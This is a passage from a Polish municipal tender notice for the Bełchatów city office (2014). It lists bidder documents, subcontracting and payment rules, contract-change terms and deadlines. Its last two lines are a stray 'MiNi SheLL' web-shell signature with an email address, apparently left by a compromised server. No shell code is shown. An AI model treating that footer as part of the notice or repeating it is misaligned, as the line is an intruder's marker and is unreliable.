3.aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert. 4.aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.   
5.aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym  w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.
6.aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym  w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia  albo składania ofert.
7.aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym  w art. 24 ust. 1 pkt  10 i 11 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu      o udzielenie zamówienia  albo składania ofert.
C. Wykonawca załącza do oferty  poza w/w dokumentami 
1.formularz ofertowy, cenowy i kosztorysowy  - zgodnie  z załączonymi wzorami 
2.listę podmiotów należących do  tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy  Prawo zamówień publicznych  albo  informację o tym,  że wykonawca nie należy do grupy kapitałowej  - zgodnie z ustawą z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów /Dz. U. Nr 50, poz. 331 z późn. zm/ - zgodnie z załączonymi wzorami.
Podmioty zagraniczne
W przypadku złożenia oferty przez podmioty zagraniczne dokumenty, o których mowa  w pkt VI SIWZ, zastępuje się  odpowiednimi dokumentami - zgodnie z  Rozporządzeniem  Prezesa Rady Ministrów z dnia 19  lutego  2013 roku  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane Dz. U. z 2013 r., poz. 231, tj.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania  poza terytorium  Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w  Pkt VI lit. B pkt  2 -4 i 6   specyfikacji istotnych warunków zamówienia, składa dokument  lub dokumenty  wystawione w kraju , w którym ma siedzibę  lub miejsce zamieszkania, potwierdzające odpowiednio , że 
a.nie otwarto jego likwidacji ani nie ogłoszono upadłości- wystawionego/nych nie wcześniej niż 6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
b.nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności lub wstrzymania decyzji właściwego  organu - wystawionych nie  wcześniej niż 3  miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
c.nie orzeczono wobec  niego zakazu ubiegania się o zamówienie wystawionego/nych nie wcześniej niż 6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
oraz zamiast dokumentu określonego w pkt VI lit. B ppkt 5 i 7  - składa  zaświadczenie  właściwego  organu sądowego lub administracyjnego  miejsca zamieszkania  albo zamieszkania osoby, której dokumenty dotyczą w zakresie  określonym w art. 24 ust. 1 pkt 4-8, 10-11 ustawy. - wystawionego/nych nie wcześniej niż 6 miesięcy przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
Informacja dotycząca rozwiązań równoważnych.
Nie dotyczy.
Informacja dotycząca podwykonawców
Zamawiający  dopuszcza  udział podwykonawców w realizacji przedmiotu zamówienia.
Wykonawca  określi w formularzu ofertowym wzór w załączeniu jaki zakres  rzeczowy robót będzie wykonywał za pośrednictwem podwykonawców, nazwę /firmę/ podwykonawcy oraz okres udziału podwykonawcy.
Warunki realizacji  przedmiotu zamówienia za  pośrednictwem  podwykonawcy oraz wymagania zamawiającego w tym zakresie - zgodnie z § 3 projektu umowy załącznik do SIWZ  tj.
Wykonawca zobowiązany jest oświadczyć jakie  roboty będzie wykonywał za pośrednictwem podwykonawców.
Pozostałe roboty nie wymienione przez wykonawcę w formularzu ofertowym a  wchodzące w zakres rzeczowy przedmiotu umowy, wykonawca  wykona osobiście.
Zamawiający nie wyraża zgody na zawieranie umów przez podwykonawcę
z dalszymi podwykonawcami. 
Dla zawarcia ważnej umowy pomiędzy wykonawcą, a podwykonawcą wymagana jest  zgoda zamawiającego. Jeżeli zamawiający w terminie 14 dni od przedstawienia mu  
przez wykonawcę  projektu umowy nie zgłosi na piśmie sprzeciwu lub zastrzeżeń, uważa się, że wyraził zgodę na zawarcie umowy. 
Wykonawca przedłoży zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, w terminie 7 dni od jej zawarcia.
Wykonawca zobowiązany jest do zawarcia umowy z podwykonawcą zgodnie 
z zakresem   rzeczowym robót określonym w ofercie przyjętej przez zamawiającego. Umowa pomiędzy wykonawcą, a podwykonawcą wymaga formy pisemnej pod rygorem nieważności. Termin płatności w umowie o  podwykonawstwo, za zakres prac  wykonywany przez podwykonawcę nie może być dłuższy niż 21 dni.
W przypadku wykonywania robót przez podwykonawcę, wykonawca zobowiązany jest załączyć do wystawionej przez siebie faktury, co najmniej na 5 dni roboczych przed terminem płatności: 
-kserokopii faktury podwykonawcy, potwierdzonej za zgodność z oryginałem przez wykonawcę,
-kserokopii protokółu odbioru robót potwierdzonego za zgodność z oryginałem przez Wykonawcę,
-dowodu zapłaty zobowiązań wobec podwykonawcy, 
-oświadczenia podwykonawcy, którego wzór stanowi załącznik nr 1 do niniejszej umowy, z datą nie wcześniejszą niż  data wystawienia faktury przez Wykonawcę.
W przypadku nie złożenia w/w  dokumentów i uchylania się od obowiązku zapłaty przez wykonawcę podwykonawcy, zamawiający może dokonać bezpośredniej zapłaty wymagalnego wynagrodzenia przysługującego podwykonawcy, który zawarł zaakceptowaną przez zamawiającego umowę o podwykonawstwo. Wynagrodzenie dotyczy wyłącznie należności powstałych po zaakceptowaniu przez zamawiającego umowy o podwykonawstwo,
bezpośrednia zapłata obejmuje wyłącznie należne wynagrodzenie, bez odsetek, należnych podwykonawcy.
Przed dokonaniem bezpośredniej zapłaty zamawiający jest obowiązany umożliwić wykonawcy zgłoszenie pisemnych uwag dotyczących zasadności bezpośredniej zapłaty wynagrodzenia podwykonawcy, o którym mowa powyżej. Zamawiający informuje 
o terminie zgłaszania uwag, nie krótszym niż 7 dni od dnia doręczenia tej informacji.
W przypadku zgłoszenia uwag, o których mowa powyżej, w terminie wskazanym przez zamawiającego, zamawiający może:
-nie dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli wykonawca wykaże niezasadność takiej zapłaty albo
-złożyć do depozytu sądowego kwotę potrzebną na pokrycie wynagrodzenia podwykonawcy w przypadku istnienia zasadniczej wątpliwości zamawiającego co do wysokości należnej zapłaty lub podmiotu, któremu płatność się należy, albo
-dokonać bezpośredniej zapłaty wynagrodzenia podwykonawcy, jeżeli podwykonawca wykaże zasadność takiej zapłaty.
W przypadku dokonania bezpośredniej zapłaty podwykonawcy, o której mowa powyżej zamawiający potrąca kwotę wypłaconego wynagrodzenia z wynagrodzenia należnego wykonawcy.

Konieczność wielokrotnego dokonywania bezpośredniej zapłaty podwykonawcy lub konieczność dokonania bezpośrednich zapłat na sumę większą niż 5% wartości umowy 
w sprawie zamówienia publicznego może stanowić podstawę do odstąpienia od umowy 
w sprawie zamówienia publicznego przez zamawiającego.
W razie wytoczenia powództwa przez  podwykonawcę przeciwko zamawiającemu, wykonawca - na żądanie zamawiającego - zobowiązuje się do   wzięcia udziału na swój koszt w postępowaniu w zakresie niezbędnym do ochrony zamawiającego przed odpowiedzialnością wobec podwykonawcy.
W przypadku wytoczenia przez podwykonawcę   powództwa  zamawiającemu, o zapłatę w trybie art. 647 1 § 5 kodeksu cywilnego, wykonawca zobowiązany jest do zwrotu poniesionych przez zamawiającego kosztów sądowych.
Zmawiający dopuszcza możliwość zmiany  podwykonawców, zgodnie z postanowieniami   art. 647 1  kodeksu cywilnego.
Ponadto zamawiający  żąda od wykonawcy   podania w ofercie w szczególności:
zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,
nazwy firmy podwykonawców, na których zasoby wykonawca się  
  powołuje na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania  
  warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1. 


	  Dokumenty w/w powinny zostać złożone w oryginale lub kopii	poświadczonej      za zgodność z oryginałem, przez wykonawcę na każdej stronie zawierającej informacje. 
W przypadku  wykonawców wspólnie ubiegających się  o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca   polega na zasadach  określonych w art. 26 ust. 2b w/w ustawy , kopie dokumentów  dotyczących odpowiednio  wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio  przez wykonawcę lub te podmioty.

Zamawiający żąda udzielenia gwarancji: 

Wykonawca udziela gwarancji na wykonany zakres prac zgodny z zapisami zawartymi w formularzy cenowym, licząc od dnia odbioru końcowego. 

Strony umowy ustalają 2 letni okres rękojmi na roboty wykonane na podstawie niniejszej umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>POSTANOWIENIA UMOWY.

Zgodnie z załączonym do SIWZ  projektem  umowy -załącznik do SIWZ
Zamawiający  przewiduje możliwości zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. 

Zgodnie z zapisami § 5 projektu umowy Strony dopuszczają zmianę treści umowy w następujących  przypadkach, tj:
-zmiany zasad płatności,
-zmiany formy zabezpieczenia należytego wykonania umowy,
-zmiany zakresu prac powierzonych podwykonawcy lub zgłoszenia udziału podwykonawcy, zmiana taka nastąpi zgodnie z postanowieniami art. 6471  kodeksu cywilnego,
-zmiany oznaczenia danych Stron, a w przypadku gdy stroną umowy jest konsorcjum - zmiany lidera konsorcjum,
-zmiany stawki podatku od towarów i usług (VAT)  przewiduje się  możliwość zmiany kwoty brutto o różnicę wynikającą z tej zmiany zgodnie z obowiązującymi przepisami. Zmiana stawek pozostałych podatków nie będzie podstawą do zmiany wynagrodzenia.	


Zamawiający dopuszcza możliwość odstąpienia  od umowy  w okolicznościach  określonych w projekcie umowy - załącznik do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.belchatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bełchatowa
ul. Kościuszki 1, bud. B p.13
97-400 Bełchatów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 10:00, miejsce: Urząd Miasta Bełchatowa
Kancelaria Prezydenta-Kancelaria Ogólna
ul. Kościuszki 1
97-400 Bełchatów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com